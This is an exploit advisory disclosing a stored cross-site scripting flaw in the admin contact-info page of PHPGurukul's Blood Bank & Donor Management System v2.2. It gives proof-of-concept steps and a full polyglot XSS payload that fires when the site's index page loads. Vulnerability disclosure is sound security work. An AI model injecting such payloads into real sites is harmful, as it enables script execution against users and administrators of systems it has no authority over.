# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS# Application: Blood Donor Management System# Version: v2.2 # Bugs:Stored XSS# Technology: PHP# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/# Date: 12.09.2023# Author: SoSPiro# Tested on: Windows#POC========================================1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress"or" Email id "or" Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert('1'))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.
